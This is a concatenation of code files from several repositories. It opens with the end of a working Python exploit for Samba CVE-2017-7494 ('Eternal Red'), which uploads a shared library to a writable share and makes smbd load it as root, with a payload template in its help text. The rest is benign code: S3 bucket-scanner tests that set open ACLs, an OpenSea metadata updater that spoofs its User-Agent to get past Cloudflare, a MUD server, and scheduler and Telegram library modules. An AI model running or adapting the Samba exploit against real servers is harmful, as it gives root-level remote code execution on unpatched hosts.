closeFid(open_message.tid, open_message.payload.fid)
callback(( file_obj, open_message.payload.file_attributes, 0 ))
else:
sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)
else:
errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))
def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):
read_count = self.max_raw_size - 2
m = SMBMessage(ComReadAndxRequest(fid = fid,
offset = offset,
max_return_bytes_count = read_count,
min_return_bytes_count = min(0xFFFF, read_count)))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,
read_len = read_len, remaining_len = remaining_len)
def readCB(read_message, **kwargs):
# To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.
if not read_message.status.hasError:
read_len = kwargs['read_len']
remaining_len = kwargs['remaining_len']
data_len = read_message.payload.data_length
if max_length > 0:
if data_len > remaining_len:
file_obj.write(read_message.payload.data[:remaining_len])
read_len += remaining_len
remaining_len = 0
else:
file_obj.write(read_message.payload.data)
remaining_len -= data_len
read_len += data_len
else:
file_obj.write(read_message.payload.data)
read_len += data_len
if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):
closeFid(read_message.tid, kwargs['fid'])
callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements
else:
sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)
else:
messages_history.append(read_message)
closeFid(read_message.tid, kwargs['fid'])
errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))
def closeFid(tid, fid):
m = SMBMessage(ComCloseRequest(fid))
m.tid = tid
self._sendSMBMessage(m)
messages_history.append(m)
if service_name not in self.connected_trees:
def connectCB(connect_message, **kwargs):
messages_history.append(connect_message)
if not connect_message.status.hasError:
self.connected_trees[service_name] = connect_message.tid
sendOpen(connect_message.tid)
else:
errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))
m = SMBMessage(ComTreeConnectAndxRequest(r'\\%s\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, ''))
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)
messages_history.append(m)
else:
sendOpen(self.connected_trees[service_name])
def get_connection(user, password, server, port, force_smb1=False):
if force_smb1:
smb_structs.SUPPORT_SMB2 = False
conn = SMBConnectionEx(user, password, "", "server")
assert conn.connect(server, port)
return conn
def get_share_info(conn):
conn.hook_listShares()
return conn.listShares()
def find_writeable_share(conn, shares):
print("[+] Searching for writable share")
filename = "red"
test_file = tempfile.TemporaryFile()
for share in shares:
try:
# If it's not writeable this will throw
conn.storeFile(share.name, filename, test_file)
conn.deleteFiles(share.name, filename)
print("[+] Found writeable share: " + share.name)
return share
except:
pass
return None
def write_payload(conn, share, payload, payload_name):
with open(payload, "rb") as fin:
conn.storeFile(share.name, payload_name, fin)
return True
def convert_share_path(share):
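# Strips the drive prefix Samba reports and flips the slashes,
# e.g. (illustrative) "C:\var\tmp" -> "/var/tmp".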
path = share.path[2:]
path = path.replace("\\", "/")
return path
def load_payload(user, password, server, port, fullpath):
conn = get_connection(user, password, server, port, force_smb1 = True)
conn.hook_retrieveFile()
print("[+] Attempting to load payload")
temp_file = tempfile.TemporaryFile()
try:
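# Opening a "pipe" whose name is the full on-disk path of the uploaded library
# is what makes a vulnerable smbd load it (CVE-2017-7494).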
conn.retrieveFile("IPC$", "\\\\PIPE\\" + fullpath, temp_file)
except:
pass
return
def drop_payload(user, password, server, port, payload):
payload_name = "charizard"
conn = get_connection(user, password, server, port)
shares = get_share_info(conn)
share = find_writeable_share(conn, shares)
if share is None:
print("[!] No writeable shares on " + server + " for user: " + user)
sys.exit(-1)
if not write_payload(conn, share, payload, payload_name):
print("[!] Failed to write payload: " + str(payload) + " to server")
sys.exit(-1)
conn.close()
fullpath = convert_share_path(share)
return os.path.join(fullpath, payload_name)
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description= """Eternal Red Samba Exploit -- CVE-2017-7494
Causes vulnerable Samba server to load a shared library in root context
Credentials are not required if the server has a guest account
For remote exploit you must have write permissions to at least one share
Eternal Red will scan the Samba server for shares it can write to
It will also determine the fullpath of the remote share
For local exploit provide the full path to your shared library to load
Your shared library should look something like this
extern bool change_to_root_user(void);
int samba_init_module(void)
{
change_to_root_user();
/* Do what thou wilt */
}
""")
parser.add_argument("payload", help="path to shared library to load", type=str)
parser.add_argument("server", help="Server to target", type=str)
parser.add_argument("-p", "--port", help="Port to use defaults to 445", type=int)
parser.add_argument("-u", "--username", help="Username to connect as defaults to nobody", type=str)
parser.add_argument("--password", help="Password for user default is empty", type=str)
parser.add_argument("--local", help="Perform local attack. Payload should be fullpath!", type=bool)
args = parser.parse_args()
if not os.path.isfile(args.payload):
print("[!] Unable to open: " + args.payload)
sys.exit(-1)
port = 445
user = "nobody"
password = ""
fullpath = ""
if args.port:
port = args.port
if args.username:
user = args.username
if args.password:
        password = args.password
if args.local:
fullpath = args.payload
else:
fullpath = drop_payload(user, password, args.server, port, args.payload)
load_payload(user, password, args.server, port, fullpath)
if __name__ == "__main__":
main()
``` |
{
"source": "0xToast/S3Scanner",
"score": 3
} |
#### File: S3Scanner/S3Scanner/exceptions.py
```python
class AccessDeniedException(Exception):
def __init__(self, message):
pass
# Call the base class constructor
# super().__init__(message, None)
# Now custom code
# self.errors = errors
class InvalidEndpointException(Exception):
def __init__(self, message):
self.message = message
class BucketMightNotExistException(Exception):
def __init__(self):
pass
```
#### File: S3Scanner/tests/TestUtils.py
```python
import random
import string
import boto3
class TestBucketService:
def __init__(self):
self.session = boto3.Session(profile_name='privileged')
self.s3_client = self.session.client('s3')
@staticmethod
def generate_random_bucket_name(length=40):
candidates = string.ascii_lowercase + string.digits
return 's3scanner-' + ''.join(random.choice(candidates) for i in range(length))
def delete_bucket(self, bucket_name):
self.s3_client.delete_bucket(Bucket=bucket_name)
def create_bucket(self, danger_bucket):
bucket_name = self.generate_random_bucket_name()
# For type descriptions, refer to: https://github.com/sa7mon/S3Scanner/wiki/Test-Buckets
if danger_bucket == 1:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers')
self.s3_client.put_bucket_acl(Bucket=bucket_name,
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers',
GrantWriteACP='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers')
elif danger_bucket == 2:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AllUsers',
GrantWriteACP='uri=http://acs.amazonaws.com/groups/global/AllUsers')
elif danger_bucket == 3:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantRead='uri=http://acs.amazonaws.com/groups/global/AllUsers',
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers',
GrantWriteACP='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers')
elif danger_bucket == 4:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers,'
'uri=http://acs.amazonaws.com/groups/global/AllUsers')
elif danger_bucket == 5:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantWriteACP='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers,'
'uri=http://acs.amazonaws.com/groups/global/AllUsers')
else:
raise Exception("Unknown danger bucket type")
return bucket_name
``` |
{
"source": "0xtoko/opensea-meta-updater",
"score": 3
} |
#### File: 0xtoko/opensea-meta-updater/manual_mutation.py
```python
import json
import itertools
import logging
import argparse
import os
logger = logging.getLogger(__name__)
# Process items in chunks
def chunks(iterable, size):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, size))
if not chunk:
break
yield chunk
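# Example: list(chunks(range(5), 2)) -> [(0, 1), (2, 3), (4,)]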
# Save update list
def save_manual_mutation(contract_address, index, mutation):
path = f"./manual_push_mutation/{contract_address}/"
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(f"./{path}/{index}.graphql", 'w') as file:
file.write(mutation)
def load_update_items(contract_address):
with open(f'update_lists/{contract_address}_item_list.json', 'r') as file:
items = json.load(file)
return sorted(items,key=lambda x: x["node"]["asset"]["tokenId"])
# Parse args
def get_script_arguments():
parser = argparse.ArgumentParser(description='Usage example: python manual_mutation.py -c "0x6c94954d0b265f657a4a1b35dfaa8b73d1a3f199"')
parser.add_argument('-c','--contract-address',required=True,type=str,help='Contract address of NFT collection.')
parser.add_argument('-b','--batch_size',type=int,default=1000,help="(optional) Number of Queues to batch in one request on '--update_metadata'. Default is 1000.")
args = parser.parse_args()
logger.info(args)
return args
def create_mutation(contract_address, items, batch_size):
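    # Batch refresh calls into one GraphQL mutation, using each token id
    # (prefixed with "_") as the alias, e.g.:
    #   mutation {_1: assets {refresh(asset: "<relayId>")} _2: ...}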
index = 0
for item_chunk in chunks(items, batch_size):
index += 1
mutation_string = ""
# Create query detail
for item in item_chunk:
            try:
                item_id = item["node"]["asset"]["relayId"]
                alias = "_" + str(item["node"]["asset"]["tokenId"])
            except:
                logger.warning(f'Item ID not Found for: {item["node"]["asset"]["name"]}')
                continue
            mutation_string += f'{alias}: assets {{refresh(asset: "{item_id}")}}'
mutation = f'mutation {{{mutation_string}}}'
# uri_query = query + "&variables="
save_manual_mutation(contract_address, index, mutation)
def main():
logging.basicConfig(format='%(asctime)s - Opensea Meta Updater - [Manual Mutation Generator] - %(levelname)s - %(message)s', level=logging.INFO)
args = get_script_arguments()
items = load_update_items(args.contract_address)
create_mutation(args.contract_address, items, args.batch_size)
logger.info("Completed")
if __name__ == '__main__':
main()
```
#### File: 0xtoko/opensea-meta-updater/update.py
```python
import argparse
import json
import logging
import itertools
import requests
import time
logger = logging.getLogger(__name__)
# Process items in chunks
def chunks(iterable, size):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, size))
if not chunk:
break
yield chunk
# Save update list
def save_update_items(contract_address, items):
with open(f'update_lists/{contract_address}_item_list.json', 'w') as file:
json.dump(items, file)
# Load update list
def load_update_items(contract_address):
with open(f'update_lists/{contract_address}_item_list.json', 'r') as file:
items = json.load(file)
return sorted(items,key=lambda x: x["node"]["asset"]["tokenId"])
# load query from file
def load_gql_query(file_name):
with open(f'query/{file_name}', 'r') as file:
query = file.read()
return query
# Parse args
def get_script_arguments():
parser = argparse.ArgumentParser(description='Usage example: python update.py --create-list --update_metadata -c "0x6c94954d0b265f657a4a1b35dfaa8b73d1a3f199"')
parser.add_argument('--create-list',action='store_true',help='This creates a json file with necessary data (metadata & item ID) to request updates on metadata in Opensea. This should only used once per contract unless new NFTs are minted. Requires: "--contract_address".')
parser.add_argument('--update_metadata',action='store_true',help='POST metadata update queue to Opensea. Requires: "--contract_address".')
parser.add_argument('-c','--contract-address',required=True,type=str,help='Contract address of NFT collection.')
parser.add_argument('-b','--batch_size',type=int,default=1000,help="(optional) Number of Queues to batch in one request on '--update_metadata'. Default is 1000.")
# parser.add_argument('--cool-down',type=int,help='(optional) Seconds to wait when API rate limit is reached.')
# parser.add_argument('--delay',type=int,help='(optional) Interval of each API call.')
args = parser.parse_args()
logger.info(args)
return args
# Query collectionSlug and total number of items from Contract address
def get_collection_detail(contract_address, cool_down=0.2):
url = "https://api.opensea.io/graphql/"
# bypass cloudflare
header={
"Content-Type": "application/json",
"User-Agent": "PostmanRuntime/7.26.8"
}
# Graphql Query: Get collectionSlug
slug_query = load_gql_query("slug_query.graphql")
slug_variables = {
"query": f"{contract_address}"
}
slug_param = {'query': slug_query, 'variables': slug_variables}
# Make http POST
slug_response = requests.post(url, json=slug_param, headers=header)
if slug_response.status_code != 200:
logger.warning(slug_response.text)
logger.warning("Terminating Process: Check contract address")
return ((),)
try:
slug_data = slug_response.json()
slug_result = slug_data["data"]["collections"]["edges"][0]
collection_slug = slug_result["node"]["slug"]
except:
logger.warning("Terminating Process: No CollectionSlug Found")
return((),)
logger.info(f"Found Collection: {collection_slug}")
# wait for rate limit cooldown
time.sleep(cool_down)
# Graphql Query: Get number of items in collection
count_query = load_gql_query("collection_item_count_query.graphql")
count_variables = {
"collections": [f"{collection_slug}"]
}
count_param = {'query': count_query, 'variables': count_variables}
# Make http POST
count_response = requests.post(url, json=count_param, headers=header)
if count_response.status_code != 200:
logger.warning(count_response.text)
logger.warning("Terminating Process: POST Request Error")
return ((),)
try:
count_data = count_response.json()
count_result = count_data["data"]["search"]["totalCount"]
except:
logger.warning("Terminating Process: No totalCount Found")
return((),)
logger.info(f"Total items in Collection: {count_result}")
return (collection_slug, count_result)
# This will create update list of collection which includes data needed to queue metadata update
def create_items_list(collection_slug, total_count, limit, cool_down=0.2, delay=1):
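    # Walk the collection with cursor-based pagination: each response's
    # pageInfo.endCursor seeds the next request until hasNextPage is False.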
complete_items = []
total_null_count = 0
url = "https://api.opensea.io/graphql/"
next_curser = ""
has_next_page = True
# bypass cloudflare
header={
"Content-Type": "application/json",
"User-Agent": "PostmanRuntime/7.26.8"
}
while has_next_page:
time.sleep(delay)
query = load_gql_query("asset_search_list_pagination_query.graphql")
variables = {
"collections": [
f"{collection_slug}"
],
"count": limit,
"cursor": f"{next_curser}"
}
param = {'query': query, 'variables': variables}
# Flag for http request result
success = False
while not success:
# Make http POST
response = requests.post(url, json=param, headers=header)
# Check for HTTP error
if response.status_code != 200:
logger.warning(response.text)
                # Rate limit cooldown (cool_down may be a fractional number of seconds)
                time.sleep(cool_down)
# Request Success: Escape HTTP request loop
else:
success = True
try:
data = response.json()
search_result = data["data"]["search"]
items = search_result["edges"]
# Remove null assets
filtered_items = list(filter(lambda x: x["node"]["asset"] != None, items))
# Log number of null assets
if len(filtered_items) < len(items):
null_count = len(items)-len(filtered_items)
total_null_count += null_count
logger.warning(f"Found {null_count} null Asset.")
complete_items.extend(filtered_items)
# Check if next page is available
has_next_page = search_result["pageInfo"]["hasNextPage"]
if has_next_page:
next_curser = search_result["pageInfo"]["endCursor"]
except:
logger.warning(f"{response.text}")
logger.warning("Error Ignored")
has_next_page = False
logger.info(f"{len(complete_items)}/{total_count} items completed")
logger.info(f"{total_null_count} items returned 'null'")
return complete_items
# This will queue metadata update to Opensea
def queue_metadata_update(items, batch_size, cool_down=3, delay=3):
url = "https://api.opensea.io/graphql/"
# bypass cloudflare
header={
"Content-Type": "application/json",
"User-Agent": "PostmanRuntime/7.26.8"
}
total_update_count = 0
total_fail_count = 0
# Batch items to send in one request
for item_chunk in chunks(items, batch_size):
query_string = ""
# Create query detail
for item in item_chunk:
            try:
                item_id = item["node"]["asset"]["relayId"]
                alias = "_" + str(item["node"]["asset"]["tokenId"])
            except:
                logger.warning(f'Item ID not Found for: {item["node"]["asset"]["name"]}')
                continue
            query_string += f'{alias}: assets {{refresh(asset: "{item_id}")}}'
query = f'mutation {{{query_string}}}'
param = {'query': query}
# Flag for http request result
success = False
while not success:
# Make http POST
response = requests.post(url, json=param, headers=header)
# Check for HTTP error
if response.status_code != 200:
logger.warning(f"Response HTML:\n{response.text}")
logger.info(f"Retrying request in {cool_down} second(s).")
# Rate Limit Cooldown Counter
for _ in range(cool_down, 0, -1):
time.sleep(1)
# Request Success: Escape HTTP request loop
else:
success = True
fail_count = 0
# Parse response to check for unsuccessful update
try:
data = response.json()
results = data["data"]
for result_alias in results:
status = results[result_alias]["refresh"]
if status != True:
logger.warning(f"Failed to queue item with token id: {result_alias[1:]}")
fail_count += 1
except:
logger.warning("Failed to parse queue result json")
time.sleep(delay)
# Show progress
total_update_count += len(item_chunk)-fail_count
logger.info(f"Queued Update: {total_update_count}/{len(items)}")
logger.info(f"Successfully Queued {len(items)-total_fail_count}/{len(items)}")
def main():
logging.basicConfig(format='%(asctime)s - Opensea Meta Updater - [Initialize] - %(levelname)s - %(message)s', level=logging.INFO)
args = get_script_arguments()
if args.create_list:
logging.basicConfig(format='%(asctime)s - Opensea Meta Updater - [Create List] - %(levelname)s - %(message)s', level=logging.INFO,force=True)
(collection_slug, total_count) = get_collection_detail(args.contract_address)
items = create_items_list(collection_slug, total_count, 100) #limit locked to 100. 100 max.
save_update_items(args.contract_address,items)
logger.info(f"Successfully Created and Saved {collection_slug}'s Items List")
if args.update_metadata:
logging.basicConfig(format='%(asctime)s - Opensea Meta Updater - [Post Update] - %(levelname)s - %(message)s', level=logging.INFO,force=True)
items = load_update_items(args.contract_address)
queue_metadata_update(items, args.batch_size)
if __name__ == '__main__':
main()
``` |
{
"source": "0xtr/minimud_python",
"score": 3
} |
#### File: 0xtr/minimud_python/main.py
```python
import random
import selectors
import socket
import sys
import pdb
from src.io import IncomingHandler
from src.io.MessageQueue import MessageQueue
from src.sqlitehelper import SQLiteHelper
# debugging
# pdb.set_trace()
port = random.randint(5000, 6000)
print("Use port " + str(port) + " for connections\n")
# open the sqlite3 dbs
dbManager = SQLiteHelper.SQLDBConnector()
assert dbManager.connectedToAllDatabases
# create the master socket
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listensock.setblocking(0)
# bind it to our chosen port
try:
listensock.bind(("", port))
except Exception as e:
print(e.args)
sys.exit(1)
# set listener for connections
listensock.listen()
def accept(sock, mask):
newsock, address = sock.accept()
newsock.setblocking(False)
print("connection from " + str(newsock) + " at " + str(address))
MessageQueue.initQueue(newsock)
selector.register(newsock, selectors.EVENT_READ, read)
# TODO: welcome them nicely
def read(sock, mask):
IncomingHandler.incoming_handler(sock)
# TODO: store selector in class
selector = selectors.DefaultSelector()
selector.register(listensock, selectors.EVENT_READ, accept)
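# Event loop: selector.select() blocks until a registered socket is ready;
# key.data holds the callback (accept or read) registered for that socket.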
while True:
events = selector.select()
for key, mask in events:
callback = key.data
callback(key.fileobj, mask)
```
#### File: src/io/CommandInterpreter.py
```python
from enum import Enum, auto
def get_command_info(command):
newCommand = Command()
commandList = Command.getCompleteList()
for commandType in list(commandList):
commands = commandList[commandType]
        if command in commands:
newCommand.type = commandType
newCommand.subtype = commands[command]
break
print("newCommand: " + str(newCommand.type))
return newCommand
def get_available_commands():
num = 0
commands = Command.getCompleteList()
for i in commands.keys():
num += len(commands[i])
print("command num is " + num)
return num
class Movement(Enum):
DIR_NORTH = auto()
DIR_EAST = auto()
DIR_SOUTH = auto()
DIR_WEST = auto()
DIR_UP = auto()
DIR_DOWN = auto()
DIR_NORTHEAST = auto()
DIR_SOUTHEAST = auto()
DIR_SOUTHWEST = auto()
DIR_NORTHWEST = auto()
DIR_NOT = auto()
class CommandTypes(Enum):
MOVEMENT = auto()
ROOM_CHANGE = auto()
SYSTEM_ACTION = auto()
TRAVEL_ACTION = auto()
INFO_REQUEST = auto()
COMMAND_NOT = -1
class SystemAction(Enum):
SYS_SAY = auto()
SYS_QUIT = auto()
SYS_NOT = auto()
class RoomChange(Enum):
ROOM_ADD = auto()
ROOM_REMOVE = auto()
ROOM_SET_NAME = auto()
ROOM_SET_DESC = auto()
ROOM_SET_FLAG = auto()
ROOM_SET_EXIT = auto()
ROOM_SET_NOT = auto()
class InfoRequest(Enum):
INFO_ROOM = auto()
INFO_PLAYERS = auto()
INFO_MAP = auto()
INFO_COMMANDS = auto()
INFO_NOT = auto()
class TravelAction(Enum):
TRAVEL_GOTO = auto()
TRAVEL_SWAP = auto()
TRAVEL_NOT = auto()
class Command:
type = CommandTypes.COMMAND_NOT
subtype = CommandTypes.COMMAND_NOT
@staticmethod
def getCompleteList():
return {
CommandTypes.MOVEMENT:
{"north": Movement.DIR_NORTH, "n": Movement.DIR_NORTH,
"east": Movement.DIR_EAST, "e": Movement.DIR_EAST,
"south": Movement.DIR_SOUTH, "s": Movement.DIR_SOUTH,
"west": Movement.DIR_WEST, "w": Movement.DIR_WEST,
"up": Movement.DIR_UP, "u": Movement.DIR_UP,
"down": Movement.DIR_DOWN, "d": Movement.DIR_DOWN,
"northeast": Movement.DIR_NORTHEAST,
"ne": Movement.DIR_NORTHEAST,
"southeast": Movement.DIR_SOUTHEAST,
"se": Movement.DIR_SOUTHEAST,
"southwest": Movement.DIR_SOUTHWEST,
"sw": Movement.DIR_SOUTHWEST,
"northwest": Movement.DIR_NORTHWEST,
"nw": Movement.DIR_NORTHWEST},
CommandTypes.SYSTEM_ACTION:
{"say": SystemAction.SYS_SAY,
"quit": SystemAction.SYS_QUIT},
CommandTypes.INFO_REQUEST:
{"look": InfoRequest.INFO_ROOM, "l": InfoRequest.INFO_ROOM,
"players": InfoRequest.INFO_PLAYERS,
"map": InfoRequest.INFO_MAP,
"commands": InfoRequest.INFO_COMMANDS,
"?": InfoRequest.INFO_COMMANDS,
"help": InfoRequest.INFO_COMMANDS},
CommandTypes.ROOM_CHANGE:
{"mkroom": RoomChange.ROOM_ADD,
"rmroom": RoomChange.ROOM_REMOVE,
"setrname": RoomChange.ROOM_SET_NAME,
"setrdesc": RoomChange.ROOM_SET_DESC,
"setrexit": RoomChange.ROOM_SET_EXIT,
"setrflag": RoomChange.ROOM_SET_FLAG},
CommandTypes.TRAVEL_ACTION:
{"goto": TravelAction.TRAVEL_GOTO,
"swap": TravelAction.TRAVEL_SWAP}
}
def get_all_commands_as_strings():
stringList = []
commandList = Command.getCompleteList()
for commandType in list(commandList):
stringList.append(list(commandList[commandType]))
print("commands: " + str(stringList))
return stringList
def is_actual_direction(direction, check):
return direction == check or direction == (check + 1)
```
#### File: src/io/OutgoingHandler.py
```python
from src.io.CommandInterpreter import InfoRequest
from src.io.IODefs import IODefs
from src.io.OutputBuilder import print_room_to_player, print_to_player, PrintArg
from src.rooms.RoomCRUD import lookup_room
def outgoing_handler(player):
expected = buffer_pos = 0
if (1 + len(player.buffer)) <= IODefs.PRINT_LINE_WIDTH.value:
# TODO: prompt chars again
# expected += add_prompt_chars(player)
return send_and_handle_errors(player, expected)
    lines_required = get_buffer_split_by_line_width(expected) + num_of_newlines(player)
processedBuf = ''
for i in range(0, lines_required):
stop_at_char = find_reasonable_line_end(player, buffer_pos)
        processedBuf += player.buffer[buffer_pos:buffer_pos + stop_at_char]
processedBuf += "\n"
buffer_pos += stop_at_char + 1
if buffer_pos >= expected:
break
if processedBuf.rfind("\n") != len(processedBuf):
processedBuf += "\n"
player.buffer = processedBuf
return send_and_handle_errors(player, expected)
def num_of_newlines(player):
newlines = 0
for i in range(0, len(player.buffer)):
if player.buffer[i] == '\n':
newlines += 1
return newlines
def find_reasonable_line_end(player, buffer_pos):
"""Find the last space or newline in the next LINE_WIDTH chars"""
line_width_val = IODefs.PRINT_LINE_WIDTH.value
substr = player.buffer[buffer_pos:(buffer_pos + line_width_val)]
print("find line end in: " + substr)
if len(substr) < line_width_val:
return len(substr)
last_value = len(substr)
find_match = substr.rfind(" ")
    if find_match != -1:
last_value = find_match
find_match = substr.rfind("\n")
    if find_match != -1:
last_value = find_match
if (float((last_value / line_width_val) * 100)) < 70:
return line_width_val
print("last value: " + last_value)
return last_value
def get_buffer_split_by_line_width(expected):
    lines = expected / IODefs.PRINT_LINE_WIDTH.value
    if not lines.is_integer():
        lines += 1
    return int(lines)
def send_and_handle_errors(player, expected):
    # send() may deliver only part of the buffer, so loop until all of it went out
    data = player.buffer.encode()
    total = 0
    while total < len(data):
        returned = player.socket_num.send(data[total:])
        if returned == 0:
            player.buffer = ''
            return 1
        total += returned
    player.buffer = ''
    return 0
```
#### File: src/items/Inventory.py
```python
class Inventory:
itemCount = 0
def __init__(self):
print("")
class Object:
id = 0
name = ''
description = ''
keywords = ''
weight = ''
def get_new_player_inventory(socket):
# yo
hi = 0
```
#### File: src/players/PlayerMovement.py
```python
from src.io.CommandInterpreter import Command, Movement, TravelAction, \
CommandTypes
from src.io.OutputBuilder import print_to_player, PrintArg, print_room_to_player
from src.rooms.RoomCRUD import lookup_room, lookup_room_exits
from src.rooms.RoomClasses import Direction, Coordinates
from src.sqlitehelper import SQLiteHelper
def calc_coords_from_playerloc_and_dir(player):
if player.store is None:
player.coords.x = player.coords.y = player.coords.z = -1
return
info = Command()
info.type = CommandTypes.COMMAND_NOT
info.subtype = CommandTypes.COMMAND_NOT
coords = Coordinates()
coords.x += x_movement_to_vector(info)
coords.y += y_movement_to_vector(info)
coords.z += z_movement_to_vector(info)
return coords
def x_movement_to_vector(info):
    if info.subtype in (Direction.DIR_EAST,
                        Direction.DIR_NORTHEAST,
                        Direction.DIR_SOUTHEAST):
        return 1
    elif info.subtype in (Direction.DIR_SOUTHWEST,
                          Direction.DIR_NORTHWEST,
                          Direction.DIR_WEST):
        return -1
    return 0
def y_movement_to_vector(info):
    if info.subtype in (Direction.DIR_NORTH,
                        Direction.DIR_NORTHEAST,
                        Direction.DIR_NORTHWEST):
        return 1
    elif info.subtype in (Direction.DIR_SOUTHEAST,
                          Direction.DIR_SOUTHWEST,
                          Direction.DIR_SOUTH):
        return -1
    return 0
def z_movement_to_vector(info):
if info.subtype == Direction.DIR_UP:
return 1
elif info.subtype == Direction.DIR_DOWN:
return -1
return 0
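# do_movement_cmd turns a parsed direction into a coordinate delta relative
# to the origin room, e.g. DIR_NORTHEAST moves (+1, +1, 0).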
def do_movement_cmd(player, info):
direction = Movement.DIR_NOT
origin = player.coords
    destination = Coordinates()
    destination.x = origin.x
    destination.y = origin.y
    destination.z = origin.z
if info.subtype == Movement.DIR_NORTH:
direction = Movement.DIR_NORTH
destination.y = origin.y + 1
elif info.subtype == Movement.DIR_EAST:
direction = Movement.DIR_EAST
destination.x = origin.x + 1
elif info.subtype == Movement.DIR_SOUTH:
direction = Movement.DIR_SOUTH
destination.y = origin.y - 1
elif info.subtype == Movement.DIR_WEST:
direction = Movement.DIR_WEST
destination.x = origin.x - 1
elif info.subtype == Movement.DIR_DOWN:
direction = Movement.DIR_DOWN
destination.z = origin.z - 1
elif info.subtype == Movement.DIR_UP:
direction = Movement.DIR_UP
destination.z = origin.z + 1
elif info.subtype == Movement.DIR_NORTHWEST:
direction = Movement.DIR_NORTHWEST
destination.x = origin.x - 1
destination.y = origin.y + 1
elif info.subtype == Movement.DIR_NORTHEAST:
direction = Movement.DIR_NORTHEAST
destination.x = origin.x + 1
destination.y = origin.y + 1
elif info.subtype == Movement.DIR_SOUTHWEST:
direction = Movement.DIR_SOUTHWEST
destination.x = origin.x - 1
destination.y = origin.y - 1
elif info.subtype == Movement.DIR_SOUTHEAST:
direction = Movement.DIR_SOUTHEAST
destination.x = origin.x + 1
destination.y = origin.y - 1
dest_room = lookup_room(destination)
if dest_room is None:
print("oh no")
# do something
rv = lookup_room_exits(origin, dest_room)
if rv == -1:
print_to_player(player, PrintArg.PRINT_INVAL_DIR)
return
elif rv == -2:
# send them back to origin room, somewhere they shouldn't be
destination.x = 0
destination.y = 0
destination.z = 0
print_to_player(player, PrintArg.PRINT_INVAL_DIR)
# check me
else:
print_to_player(player, direction)
adjust_player_location(player, dest_room.id)
print_room_to_player(player, dest_room)
def do_travel_cmd(player, info):
if info.subtype == TravelAction.TRAVEL_GOTO:
print("ADD ME %d\n", player.socket_num)
if info.subtype == TravelAction.TRAVEL_SWAP:
print("ADD ME %d\n", player.socket_num)
def adjust_player_location(player, room_id):
    return SQLiteHelper.SQLExecution(
        "UPDATE PLAYERS SET loc_id = :room_id WHERE name = :name",
        {"room_id": room_id, "name": player.name},
        SQLiteHelper.DBTypes.PLAYER_DB)
``` |
{
"source": "0xtuytuy/unit-crypto-ski-week-poap-bot",
"score": 2
} |
#### File: apscheduler/executors/debug.py
```python
import sys
from apscheduler.executors.base import BaseExecutor, run_job
class DebugExecutor(BaseExecutor):
"""
A special executor that executes the target callable directly instead of deferring it to a
thread or process.
Plugin alias: ``debug``
"""
def _do_submit_job(self, job, run_times):
try:
events = run_job(job, job._jobstore_alias, run_times, self._logger.name)
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
```
#### File: apscheduler/schedulers/twisted.py
```python
from __future__ import absolute_import
from functools import wraps
from apscheduler.schedulers.base import BaseScheduler
from apscheduler.util import maybe_ref
try:
from twisted.internet import reactor as default_reactor
except ImportError: # pragma: nocover
raise ImportError('TwistedScheduler requires Twisted installed')
def run_in_reactor(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self._reactor.callFromThread(func, self, *args, **kwargs)
return wrapper
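# callFromThread marshals the wrapped call onto the reactor thread, since
# Twisted's reactor APIs are not thread-safe.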
class TwistedScheduler(BaseScheduler):
"""
A scheduler that runs on a Twisted reactor.
Extra options:
=========== ========================================================
``reactor`` Reactor instance to use (defaults to the global reactor)
=========== ========================================================
"""
_reactor = None
_delayedcall = None
def _configure(self, config):
self._reactor = maybe_ref(config.pop('reactor', default_reactor))
super(TwistedScheduler, self)._configure(config)
@run_in_reactor
def shutdown(self, wait=True):
super(TwistedScheduler, self).shutdown(wait)
self._stop_timer()
def _start_timer(self, wait_seconds):
self._stop_timer()
if wait_seconds is not None:
self._delayedcall = self._reactor.callLater(wait_seconds, self.wakeup)
def _stop_timer(self):
if self._delayedcall and self._delayedcall.active():
self._delayedcall.cancel()
del self._delayedcall
@run_in_reactor
def wakeup(self):
self._stop_timer()
wait_seconds = self._process_jobs()
self._start_timer(wait_seconds)
def _create_default_executor(self):
from apscheduler.executors.twisted import TwistedExecutor
return TwistedExecutor()
```
#### File: telegram/ext/commandhandler.py
```python
import re
import warnings
from typing import TYPE_CHECKING, Callable, Dict, List, Optional, Tuple, TypeVar, Union
from telegram import MessageEntity, Update
from telegram.ext import BaseFilter, Filters
from telegram.utils.deprecate import TelegramDeprecationWarning
from telegram.utils.types import SLT
